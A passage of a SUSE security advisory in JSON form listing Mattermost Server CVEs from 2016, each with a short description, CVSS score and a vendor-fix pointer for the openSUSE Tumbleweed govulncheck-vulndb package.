"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11063"
},
{
"cve": "CVE-2016-11066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11066"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.2.0. The initial_load API disclosed unnecessary personal information.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11066",
"url": "https://www.suse.com/security/cve/CVE-2016-11066"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11066"
},
{
"cve": "CVE-2016-11067",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11067"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.2.0. It allowed crafted posts that could cause a web browser to hang.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11067",
"url": "https://www.suse.com/security/cve/CVE-2016-11067"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11067"
},
{
"cve": "CVE-2016-11068",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11068"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.2.0. Attackers could read LDAP fields via injection.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11068",
"url": "https://www.suse.com/security/cve/CVE-2016-11068"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11068"
},
{
"cve": "CVE-2016-11069",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11069"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.2.0. It mishandles brute-force attempts at password change.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11069",
"url": "https://www.suse.com/security/cve/CVE-2016-11069"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11069"
},
{
"cve": "CVE-2016-11070",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11070"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.1.0. It allows XSS via theme color-code values.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11070",
"url": "https://www.suse.com/security/cve/CVE-2016-11070"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2016-11070"
},
{
"cve": "CVE-2016-11071",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11071"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.1.0. It allows XSS because the noreferrer and noopener protection mechanisms were not in place.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11071",
"url": "https://www.suse.com/security/cve/CVE-2016-11071"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11071"
},
{
"cve": "CVE-2016-11072",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11072"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.0.2. The purposes of a session ID and a Session Token were mishandled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11072",
"url": "https://www.suse.com/security/cve/CVE-2016-11072"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11072"
},
{
"cve": "CVE-2016-11073",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11073"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.0.0. It allows XSS via a Legal or Support setting.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11073",
"url": "https://www.suse.com/security/cve/CVE-2016-11073"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11073"
},
{
"cve": "CVE-2016-11074",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11074"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.0.0. A password-reset link could be reused.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11074",
"url": "https://www.suse.com/security/cve/CVE-2016-11074"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2016-11074"
},
{
"cve": "CVE-2016-11075",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11075"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.0.0. It allows attackers to obtain sensitive information about team URLs via an API.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11075",
"url": "https://www.suse.com/security/cve/CVE-2016-11075"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11075"
},
{
"cve": "CVE-2016-11076",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11076"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.0.0. It does not ensure that a cookie is used over SSL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11076",
"url": "https://www.suse.com/security/cve/CVE-2016-11076"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11076"
},
{
"cve": "CVE-2016-11077",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11077"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.0.0. It has a superfluous API in which the System Admin can change the account name and e-mail address of an LDAP account.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11077",
"url": "https://www.suse.com/security/cve/CVE-2016-11077"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.7,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11077"
},
{
"cve": "CVE-2016-11078",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11078"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.0.0. It potentially allows attackers to obtain sensitive information (credential fields within config.json) via the System Console UI.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11078",
"url": "https://www.suse.com/security/cve/CVE-2016-11078"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2016-11078"
},
{
"cve": "CVE-2016-11079",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-11079"
}
],
"notes": [
{
"category": "general",
"text": "An issue was discovered in Mattermost Server before 3.0.0. It allows XSS via a redirect URL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-11079",
"url": "https://www.suse.com/security/cve/CVE-2016-11079"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
